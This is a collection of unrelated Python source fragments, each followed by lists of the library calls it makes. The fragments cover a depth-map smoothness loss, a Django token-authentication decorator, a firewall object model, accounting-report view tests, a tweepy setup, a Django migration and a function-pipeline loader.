image_gradients_x = [self.gradient_x(img) for img in pyramid]
image_gradients_y = [self.gradient_y(img) for img in pyramid]
weights_x = [torch.exp(-torch.mean(torch.abs(g), 1, keepdim=True)) for g in image_gradients_x]
weights_y = [torch.exp(-torch.mean(torch.abs(g), 1, keepdim=True)) for g in image_gradients_y]
smoothness_x = [disp_gradients_x[i] * weights_x[i] for i in range(self.n)]
smoothness_y = [disp_gradients_y[i] * weights_y[i] for i in range(self.n)]
return smoothness_x + smoothness_y
def forward(self, input, target):
pass
|
[
"torch.nn.functional.interpolate",
"losses.bilinear_sampler.apply_disparity",
"torch.abs",
"torch.nn.functional.pad"
] |
[((881, 923), 'torch.nn.functional.pad', 'F.pad', (['img', '(0, 1, 0, 0)'], {'mode': '"""replicate"""'}), "(img, (0, 1, 0, 0), mode='replicate')\n", (886, 923), True, 'import torch.nn.functional as F\n'), ((1097, 1139), 'torch.nn.functional.pad', 'F.pad', (['img', '(0, 0, 0, 1)'], {'mode': '"""replicate"""'}), "(img, (0, 0, 0, 1), mode='replicate')\n", (1102, 1139), True, 'import torch.nn.functional as F\n'), ((1278, 1305), 'losses.bilinear_sampler.apply_disparity', 'apply_disparity', (['img', '(-disp)'], {}), '(img, -disp)\n', (1293, 1305), False, 'from losses.bilinear_sampler import apply_disparity\n'), ((1369, 1395), 'losses.bilinear_sampler.apply_disparity', 'apply_disparity', (['img', 'disp'], {}), '(img, disp)\n', (1384, 1395), False, 'from losses.bilinear_sampler import apply_disparity\n'), ((677, 755), 'torch.nn.functional.interpolate', 'nn.functional.interpolate', (['img', '[nh, nw]'], {'mode': '"""bilinear"""', 'align_corners': '(False)'}), "(img, [nh, nw], mode='bilinear', align_corners=False)\n", (702, 755), True, 'import torch.nn as nn\n'), ((2065, 2077), 'torch.abs', 'torch.abs', (['g'], {}), '(g)\n', (2074, 2077), False, 'import torch\n'), ((2168, 2180), 'torch.abs', 'torch.abs', (['g'], {}), '(g)\n', (2177, 2180), False, 'import torch\n')]
|
from essentials.views import randomString,getCurrentTime,errorResp
from models import authToken,verificationCode
from constants import AUTH_EXPIRY_MINS
from StockNest.settings import LOGIN_URL
from django.http import HttpResponseRedirect,JsonResponse,HttpRequest
from django.db.models import Q
from school.funcs import isDemoUser, demoError
# server = "https://eduhubweb.com"
# if DEBUG:
# server = "http://localhost:8000"
def getNewAuth():
while(1):
new_auth = randomString(50)
existing = authToken.objects.filter(Q(mauth = new_auth)|Q(wauth = new_auth)|Q(pmauth = new_auth)|Q(pwauth = new_auth)).count()
if existing == 0:
return new_auth
def getUserAuth(typeVal,u):
if typeVal == 'm':
try:
at = authToken.objects.get(user=u)
at.misExpired = False
at.mlastUpdated = getCurrentTime()
at.pmauth = at.mauth
at.mauth = getNewAuth()
at.save()
return at.mauth
except authToken.DoesNotExist:#first login
at = authToken.objects.create(user=u, mauth = getNewAuth(),wauth= getNewAuth(),pmauth = getNewAuth(),pwauth= getNewAuth())
return at.mauth
elif typeVal == 'w':
try:
at = authToken.objects.get(user=u)
at.wisExpired = False
at.wlastUpdated = getCurrentTime()
at.pwauth = at.wauth
at.wauth = getNewAuth()
at.save()
return at.wauth
except authToken.DoesNotExist:#first login
at = authToken.objects.create(user=u, mauth = getNewAuth(),wauth= getNewAuth(),pmauth = getNewAuth(),pwauth= getNewAuth())
return at.wauth
### authentication decorative for our website
### time based
def stocknestAPI(loginRequired=False,function=None):
def _dec(view_func):
def _view(request, *args, **kwargs):
request.user = None
headers = request.META
if loginRequired:#if required, return 401/412
if 'HTTP_AUTHORIZATION' in headers:
value = headers['HTTP_AUTHORIZATION'] #format keyw/m=auth
elements = value.split('=')
if len(elements) != 2:
return errorResp(401)
auth_val = elements[1]
if elements[0] == 'keym':
try:
obj = authToken.objects.get(mauth=auth_val)
if not checkAuthTimestamp(obj.mlastUpdated):
obj.misExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['POST','PUT','PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
try:
obj = authToken.objects.get(pmauth=auth_val)
if not checkAuthTimestamp(obj.mlastUpdated):
obj.misExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['POST','PUT','PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
return errorResp(401,"Token not found")
elif elements[0] == 'keyw':
try:
obj = authToken.objects.get(wauth=auth_val)
if not checkAuthTimestamp(obj.wlastUpdated):
obj.wisExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['POST','PUT','PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
try:
obj = authToken.objects.get(pwauth=auth_val)
if not checkAuthTimestamp(obj.wlastUpdated):
obj.wisExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['POST','PUT','PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
return errorResp(401,"Token not found")
else:
return errorResp(401)
else:
return errorResp(401)
else:#not required send 412
if 'HTTP_AUTHORIZATION' in headers:
value = headers['HTTP_AUTHORIZATION'] #format key=auth
elements = value.split('=')
if len(elements) != 2:
return errorResp(401)
auth_val = elements[1]
if elements[0] == 'keym':
try:
obj = authToken.objects.get(mauth=auth_val)
if not checkAuthTimestamp(obj.mlastUpdated):
obj.misExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
try:
obj = authToken.objects.get(pmauth=auth_val)
if not checkAuthTimestamp(obj.mlastUpdated):
obj.misExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
return errorResp(401,"Token not found")
elif elements[0] == 'keyw':
try:
obj = authToken.objects.get(wauth=auth_val)
if not checkAuthTimestamp(obj.wlastUpdated):
obj.wisExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
try:
obj = authToken.objects.get(pwauth=auth_val)
if not checkAuthTimestamp(obj.wlastUpdated):
obj.wisExpired = True
obj.save()
return errorResp(412,"Auth expired")
request.user = obj.user
if request.method in ['PATCH','DELETE']:
if isDemoUser(request.user):
return demoError()
return view_func(request, *args, **kwargs)
except authToken.DoesNotExist:
return errorResp(401,"Token not found")
return view_func(request, *args, **kwargs)
_view.__name__ = view_func.__name__
_view.__dict__ = view_func.__dict__
_view.__doc__ = view_func.__doc__
return _view
if function is None:
return _dec
else:
return _dec(function)
def checkAuthTimestamp(timestamp):
current_time = getCurrentTime()
return ((current_time - timestamp).days == 0 and (current_time - timestamp).seconds < AUTH_EXPIRY_MINS*60)
def getRequestUser(request):
user = None
if 'wauth' in request.COOKIES :
wauth = request.COOKIES['wauth']
try:
obj = authToken.objects.get(wauth=wauth)
user = obj.user
except authToken.DoesNotExist:
try:
obj = authToken.objects.get(pwauth=wauth)
user = obj.user
except authToken.DoesNotExist:
pass
return user
def getVerificationToken(u,ty):
if ty == 'ev' or ty == 'pr':
try:
vc = verificationCode.objects.get(user= u,ctype=ty)
except verificationCode.DoesNotExist:
code = randomString(6)
token = randomString(50)
vc = verificationCode.objects.create(code = code,user= u,token=token,ctype=ty)
return vc
else:
raise ValueError
|
[
"essentials.views.errorResp",
"essentials.views.getCurrentTime",
"essentials.views.randomString",
"school.funcs.isDemoUser",
"models.authToken.objects.get",
"models.verificationCode.objects.get",
"django.db.models.Q",
"school.funcs.demoError",
"models.verificationCode.objects.create"
] |
[((9527, 9543), 'essentials.views.getCurrentTime', 'getCurrentTime', ([], {}), '()\n', (9541, 9543), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((480, 496), 'essentials.views.randomString', 'randomString', (['(50)'], {}), '(50)\n', (492, 496), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((768, 797), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'user': 'u'}), '(user=u)\n', (789, 797), False, 'from models import authToken, verificationCode\n'), ((862, 878), 'essentials.views.getCurrentTime', 'getCurrentTime', ([], {}), '()\n', (876, 878), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((9809, 9843), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'wauth': 'wauth'}), '(wauth=wauth)\n', (9830, 9843), False, 'from models import authToken, verificationCode\n'), ((10200, 10246), 'models.verificationCode.objects.get', 'verificationCode.objects.get', ([], {'user': 'u', 'ctype': 'ty'}), '(user=u, ctype=ty)\n', (10228, 10246), False, 'from models import authToken, verificationCode\n'), ((1276, 1305), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'user': 'u'}), '(user=u)\n', (1297, 1305), False, 'from models import authToken, verificationCode\n'), ((1370, 1386), 'essentials.views.getCurrentTime', 'getCurrentTime', ([], {}), '()\n', (1384, 1386), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((10312, 10327), 'essentials.views.randomString', 'randomString', (['(6)'], {}), '(6)\n', (10324, 10327), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((10348, 10364), 'essentials.views.randomString', 'randomString', (['(50)'], {}), '(50)\n', (10360, 10364), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((10382, 10455), 'models.verificationCode.objects.create', 'verificationCode.objects.create', ([], {'code': 'code', 'user': 'u', 'token': 'token', 'ctype': 'ty'}), '(code=code, user=u, token=token, ctype=ty)\n', (10413, 10455), False, 'from models import authToken, verificationCode\n'), ((5664, 5678), 'essentials.views.errorResp', 'errorResp', (['(401)'], {}), '(401)\n', (5673, 5678), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((9955, 9990), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'pwauth': 'wauth'}), '(pwauth=wauth)\n', (9976, 9990), False, 'from models import authToken, verificationCode\n'), ((602, 620), 'django.db.models.Q', 'Q', ([], {'pwauth': 'new_auth'}), '(pwauth=new_auth)\n', (603, 620), False, 'from django.db.models import Q\n'), ((2284, 2298), 'essentials.views.errorResp', 'errorResp', (['(401)'], {}), '(401)\n', (2293, 2298), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((5968, 5982), 'essentials.views.errorResp', 'errorResp', (['(401)'], {}), '(401)\n', (5977, 5982), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((581, 599), 'django.db.models.Q', 'Q', ([], {'pmauth': 'new_auth'}), '(pmauth=new_auth)\n', (582, 599), False, 'from django.db.models import Q\n'), ((2452, 2489), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'mauth': 'auth_val'}), '(mauth=auth_val)\n', (2473, 2489), False, 'from models import authToken, verificationCode\n'), ((5600, 5614), 'essentials.views.errorResp', 'errorResp', (['(401)'], {}), '(401)\n', (5609, 5614), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((6136, 6173), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'mauth': 'auth_val'}), '(mauth=auth_val)\n', (6157, 6173), False, 'from models import authToken, verificationCode\n'), ((541, 558), 'django.db.models.Q', 'Q', ([], {'mauth': 'new_auth'}), '(mauth=new_auth)\n', (542, 558), False, 'from django.db.models import Q\n'), ((561, 578), 'django.db.models.Q', 'Q', ([], {'wauth': 'new_auth'}), '(wauth=new_auth)\n', (562, 578), False, 'from django.db.models import Q\n'), ((2699, 2729), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (2708, 2729), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((2898, 2922), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (2908, 2922), False, 'from school.funcs import isDemoUser, demoError\n'), ((4053, 4090), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'wauth': 'auth_val'}), '(wauth=auth_val)\n', (4074, 4090), False, 'from models import authToken, verificationCode\n'), ((6383, 6413), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (6392, 6413), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((6569, 6593), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (6579, 6593), False, 'from school.funcs import isDemoUser, demoError\n'), ((7711, 7748), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'wauth': 'auth_val'}), '(wauth=auth_val)\n', (7732, 7748), False, 'from models import authToken, verificationCode\n'), ((2967, 2978), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (2976, 2978), False, 'from school.funcs import isDemoUser, demoError\n'), ((3176, 3214), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'pmauth': 'auth_val'}), '(pmauth=auth_val)\n', (3197, 3214), False, 'from models import authToken, verificationCode\n'), ((4300, 4330), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (4309, 4330), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((4499, 4523), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (4509, 4523), False, 'from school.funcs import isDemoUser, demoError\n'), ((6638, 6649), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (6647, 6649), False, 'from school.funcs import isDemoUser, demoError\n'), ((6847, 6885), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'pmauth': 'auth_val'}), '(pmauth=auth_val)\n', (6868, 6885), False, 'from models import authToken, verificationCode\n'), ((7958, 7988), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (7967, 7988), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((8144, 8168), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (8154, 8168), False, 'from school.funcs import isDemoUser, demoError\n'), ((3440, 3470), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (3449, 3470), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((3651, 3675), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (3661, 3675), False, 'from school.funcs import isDemoUser, demoError\n'), ((3909, 3942), 'essentials.views.errorResp', 'errorResp', (['(401)', '"""Token not found"""'], {}), "(401, 'Token not found')\n", (3918, 3942), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((4568, 4579), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (4577, 4579), False, 'from school.funcs import isDemoUser, demoError\n'), ((4777, 4815), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'pwauth': 'auth_val'}), '(pwauth=auth_val)\n', (4798, 4815), False, 'from models import authToken, verificationCode\n'), ((7111, 7141), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (7120, 7141), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((7309, 7333), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (7319, 7333), False, 'from school.funcs import isDemoUser, demoError\n'), ((7567, 7600), 'essentials.views.errorResp', 'errorResp', (['(401)', '"""Token not found"""'], {}), "(401, 'Token not found')\n", (7576, 7600), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((8213, 8224), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (8222, 8224), False, 'from school.funcs import isDemoUser, demoError\n'), ((8422, 8460), 'models.authToken.objects.get', 'authToken.objects.get', ([], {'pwauth': 'auth_val'}), '(pwauth=auth_val)\n', (8443, 8460), False, 'from models import authToken, verificationCode\n'), ((3724, 3735), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (3733, 3735), False, 'from school.funcs import isDemoUser, demoError\n'), ((5041, 5071), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (5050, 5071), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((5252, 5276), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (5262, 5276), False, 'from school.funcs import isDemoUser, demoError\n'), ((5510, 5543), 'essentials.views.errorResp', 'errorResp', (['(401)', '"""Token not found"""'], {}), "(401, 'Token not found')\n", (5519, 5543), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((7382, 7393), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (7391, 7393), False, 'from school.funcs import isDemoUser, demoError\n'), ((8686, 8716), 'essentials.views.errorResp', 'errorResp', (['(412)', '"""Auth expired"""'], {}), "(412, 'Auth expired')\n", (8695, 8716), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((8884, 8908), 'school.funcs.isDemoUser', 'isDemoUser', (['request.user'], {}), '(request.user)\n', (8894, 8908), False, 'from school.funcs import isDemoUser, demoError\n'), ((9142, 9175), 'essentials.views.errorResp', 'errorResp', (['(401)', '"""Token not found"""'], {}), "(401, 'Token not found')\n", (9151, 9175), False, 'from essentials.views import randomString, getCurrentTime, errorResp\n'), ((5325, 5336), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (5334, 5336), False, 'from school.funcs import isDemoUser, demoError\n'), ((8957, 8968), 'school.funcs.demoError', 'demoError', ([], {}), '()\n', (8966, 8968), False, 'from school.funcs import isDemoUser, demoError\n')]
|
from nca47.db import api as db_api
from nca47.objects import base
from nca47.objects import fields as object_fields
from nca47.db.sqlalchemy.models.firewall import ADDROBJ
class FwAddrObjInfo(base.Nca47Object):
VERSION = '1.0'
fields = {
'id': object_fields.StringField(),
'name': object_fields.StringField(),
'ip': object_fields.StringField(),
'expip': object_fields.StringField(),
'vfwname': object_fields.StringField(),
'vfw_id': object_fields.StringField(),
'operation_fro': object_fields.StringField()
}
def __init__(self, context=None, **kwarg):
self.db_api = db_api.get_instance()
super(FwAddrObjInfo, self).__init__(context=None, **kwarg)
@staticmethod
def _from_db_object(fw_addrobj_info, db_fw_addrobj_info):
"""Converts a database entity to a formal :class:`ADDROBJ` object.
:param fw_addrobj_info: An object of :class:`ADDROBJ`.
:param fw_addrobj_info: A DB model of a ADDROBJ.
:return: a :class:`ADDROBJ` object.
"""
for field in fw_addrobj_info.fields:
fw_addrobj_info[field] = db_fw_addrobj_info[field]
fw_addrobj_info.obj_reset_changes()
return fw_addrobj_info
def create(self, context, values):
addrobj = self.db_api.create(ADDROBJ, values)
return addrobj
def delete(self, context, id_):
addrobj = self.db_api.delete_object(ADDROBJ, id_)
return addrobj
def get_object(self, context, **values):
addrobj = self.db_api.get_object(ADDROBJ, **values)
return addrobj
def get_objects(self, context, **values):
addrobj = self.db_api.get_objects(ADDROBJ, **values)
return addrobj
|
[
"nca47.objects.fields.StringField",
"nca47.db.api.get_instance"
] |
[((263, 290), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (288, 290), True, 'from nca47.objects import fields as object_fields\n'), ((308, 335), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (333, 335), True, 'from nca47.objects import fields as object_fields\n'), ((351, 378), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (376, 378), True, 'from nca47.objects import fields as object_fields\n'), ((397, 424), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (422, 424), True, 'from nca47.objects import fields as object_fields\n'), ((445, 472), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (470, 472), True, 'from nca47.objects import fields as object_fields\n'), ((492, 519), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (517, 519), True, 'from nca47.objects import fields as object_fields\n'), ((546, 573), 'nca47.objects.fields.StringField', 'object_fields.StringField', ([], {}), '()\n', (571, 573), True, 'from nca47.objects import fields as object_fields\n'), ((650, 671), 'nca47.db.api.get_instance', 'db_api.get_instance', ([], {}), '()\n', (669, 671), True, 'from nca47.db import api as db_api\n')]
|
from pytest_django.asserts import assertTemplateUsed
from fixtures_views import *
class TestInformesView:
@pytest.fixture
def form_parametros(self, django_app):
resp = django_app.get(reverse('main:informes'), user='username')
return resp.forms['parametros']
@pytest.fixture
def populate_db_informes(self, populate_database):
_, cuentas, _ = populate_database
adicionales = [
[5, '2021-01-28', 'Compra del pan', 2.50, 0, cuentas[0]],
[5, '2021-01-28', 'Compra del pan', 0, 2.50, cuentas[3]],
[6, '2021-02-15', 'Compra de fruta', 10.75, 0, cuentas[0]],
[6, '2021-02-15', 'Compra de fruta', 0, 10.75, cuentas[3]],
[7, '2021-03-18', 'Calcetines y calzoncillos', 15.85, 0, cuentas[1]],
[7, '2021-03-18', 'Calcetines y calzoncillos', 0, 15.85, cuentas[3]],
[8, '2021-04-20', 'Abrigo de invierno', 54, 0, cuentas[1]],
[8, '2021-04-20', 'Abrigo de invierno', 0, 54, cuentas[3]],
]
for num, fecha, descripcion, debe, haber, cuenta in adicionales:
Movimiento.objects.create(num=num, fecha=fecha,
descripcion=descripcion, debe=debe, haber=haber, cuenta=cuenta)
@pytest.mark.parametrize('page', ['/informes/', reverse('main:informes')])
def test_redirect_if_not_logged_in(self, page, django_app):
resp = django_app.get(page)
assert resp.status_code == 302
assert resp.url.startswith('/accounts/login/')
@pytest.mark.parametrize('page', ['/informes/', reverse('main:informes')])
def test_view_url_exists_at_desired_location(self, page, django_app):
resp = django_app.get(page, user='username')
assert resp.status_code == 200
@pytest.mark.parametrize('page', ['/informes/', reverse('main:informes')])
def test_view_uses_correct_template(self, page, django_app):
resp = django_app.get(page, user='username')
assertTemplateUsed(resp, 'main/informes.html')
def test_parametros_form_attributes(self, form_parametros):
form = form_parametros
assert form.id == 'parametros'
assert form.method == 'post'
assert form.action == '/informes/'
assert form.action == reverse('main:informes')
fields = form.fields.keys()
for f in ['f_fecha_inicial', 'f_fecha_final', 'f_tipo', 'f_cuenta', 'f_etiqueta']:
assert f in fields
@pytest.mark.parametrize('tipo, fecha_col', [
('diario', 'Fecha'), ('semanal', 'Semana'), ('mensual', 'Mes'),
('trimestral', 'Trimestre'), ('anual', 'Aรฑo')
])
def test_parametros_form_attributes_tipo(self, form_parametros, populate_db_informes, tipo, fecha_col):
populate_db_informes
form = form_parametros
form['f_tipo'].select(text=tipo)
resp = form.submit()
# check title and subtitle
for text in ['Todas las cuentas', f'Informe {tipo}, todas las fechas']:
assert text in resp.text
# check columns of table
for col in [fecha_col, 'Debe', 'Haber', 'Total']:
assert col in resp.text
@pytest.mark.parametrize('fecha_ini, fecha_fin, expected_subtitle', [
('', '2022-01-29', 'Informe diario, desde el principio hasta 2022-01-29'),
('2022-01-29', '', 'Informe diario, desde 2022-01-29 hasta el final'),
('2022-01-01', '2022-01-31', 'Informe diario, desde 2022-01-01 hasta 2022-01-31'),
], ids=['fecha-inicial', 'fecha-final', 'ambas-fechas'])
def test_form_fechas(self, form_parametros, populate_db_informes, fecha_ini, fecha_fin, expected_subtitle):
populate_db_informes
form = form_parametros
form['f_fecha_inicial'] = fecha_ini
form['f_fecha_final'] = fecha_fin
resp = form.submit()
# check title and subtitle
for text in ['Todas las cuentas', expected_subtitle]:
assert text in resp.text
@pytest.mark.parametrize('cuenta, etiqueta, expected_title', [
('100: Caja', '', 'Cuenta 100: Caja'),
('', 'gastos', 'Cuentas del tipo: Gastos corrientes'),
('100: Caja', 'gastos', 'Cuenta 100: Caja'),
], ids=['cuenta-solo', 'etiqueta-solo', 'cuenta-y-etiqueta'])
def test_form_cuentas(self, form_parametros, populate_db_informes, cuenta, etiqueta, expected_title):
populate_db_informes
form = form_parametros
form['f_cuenta'] = cuenta
form['f_etiqueta'] = etiqueta
resp = form.submit()
# check title and subtitle
for text in [expected_title, 'Informe diario, todas las fechas']:
assert text in resp.text
|
[
"pytest_django.asserts.assertTemplateUsed"
] |
[((1968, 2014), 'pytest_django.asserts.assertTemplateUsed', 'assertTemplateUsed', (['resp', '"""main/informes.html"""'], {}), "(resp, 'main/informes.html')\n", (1986, 2014), False, 'from pytest_django.asserts import assertTemplateUsed\n')]
|
import tweepy
from logger_config import logger
from secrets import *
def create_api():
auth = tweepy.OAuthHandler(API_KEY, API_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
try:
api.verify_credentials()
except Exception as e:
logger.error(f"Error {e} creating API.", exc_info=True)
logger.info("API successfully created.")
return api
|
[
"tweepy.OAuthHandler",
"logger_config.logger.info",
"logger_config.logger.error",
"tweepy.API"
] |
[((99, 139), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', (['API_KEY', 'API_SECRET'], {}), '(API_KEY, API_SECRET)\n', (118, 139), False, 'import tweepy\n'), ((211, 284), 'tweepy.API', 'tweepy.API', (['auth'], {'wait_on_rate_limit': '(True)', 'wait_on_rate_limit_notify': '(True)'}), '(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n', (221, 284), False, 'import tweepy\n'), ((423, 463), 'logger_config.logger.info', 'logger.info', (['"""API successfully created."""'], {}), "('API successfully created.')\n", (434, 463), False, 'from logger_config import logger\n'), ((363, 418), 'logger_config.logger.error', 'logger.error', (['f"""Error {e} creating API."""'], {'exc_info': '(True)'}), "(f'Error {e} creating API.', exc_info=True)\n", (375, 418), False, 'from logger_config import logger\n')]
|
# Generated by Django 3.0.2 on 2020-04-13 17:03
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mob', models.CharField(max_length=100)),
('fever', models.IntegerField()),
('tired', models.BooleanField(default=False)),
('throat', models.BooleanField(default=False)),
('bodypain', models.BooleanField(default=False)),
('invisit', models.BooleanField(default=False)),
('pubvisit', models.BooleanField(default=False)),
('hivisit', models.BooleanField(default=False)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"django.db.models.CharField",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.IntegerField",
"django.db.models.DateTimeField"
] |
[((300, 393), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (316, 393), False, 'from django.db import migrations, models\n'), ((416, 448), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (432, 448), False, 'from django.db import migrations, models\n'), ((477, 498), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (496, 498), False, 'from django.db import migrations, models\n'), ((527, 561), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (546, 561), False, 'from django.db import migrations, models\n'), ((591, 625), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (610, 625), False, 'from django.db import migrations, models\n'), ((657, 691), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (676, 691), False, 'from django.db import migrations, models\n'), ((722, 756), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (741, 756), False, 'from django.db import migrations, models\n'), ((788, 822), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (807, 822), False, 'from django.db import migrations, models\n'), ((853, 887), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (872, 887), False, 'from django.db import migrations, models\n'), ((921, 960), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (941, 960), False, 'from django.db import migrations, models\n'), ((994, 1029), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (1014, 1029), False, 'from django.db import migrations, models\n')]
|
import ast
import imp
import inspect
import types
from .invocation_tools import _name_of
class PipelineCommand:
def __init__(self, name):
self._name = name
class SkipTo(PipelineCommand):
# TODO: Singleton?
def __init__(self, resuming_function_name):
self.function_name = _name_of(resuming_function_name)
Done = PipelineCommand('DONE')
def collect_func_ordering(file_path_or_module):
"""
Collect all top-level functions in a file or module, in order.
:param file_path_or_module: the path to the python file, or a module.
:return: the ordered top-level function names.
"""
if isinstance(file_path_or_module, types.ModuleType):
file_path = inspect.getsourcefile(file_path_or_module)
else:
file_path = file_path_or_module
with open(file_path, 'r') as fp:
root = ast.parse(fp.read())
names = []
for node in ast.iter_child_nodes(root):
if isinstance(node, ast.FunctionDef):
names.append(node.name)
return names
def collect_pipeline(module, skip_private=True, reloading=True):
"""
Load the functions in a module in their definition order.
:param module: a python module
:param skip_private: ignore functions starting with '_'
:param reloading: reload the module prior to collection
:return: the functions in their definition order
"""
if reloading:
module = imp.reload(module)
pipeline = []
env = vars(module)
for name in collect_func_ordering(module):
if skip_private and name.startswith('_'):
continue
pipeline.append(env[name])
return pipeline
class Pipeline(object):
"""
A sequence of functions for data processing.
"""
def __init__(self):
self._pipeline = []
self._captures = []
def __iter__(self):
return iter(self._captures)
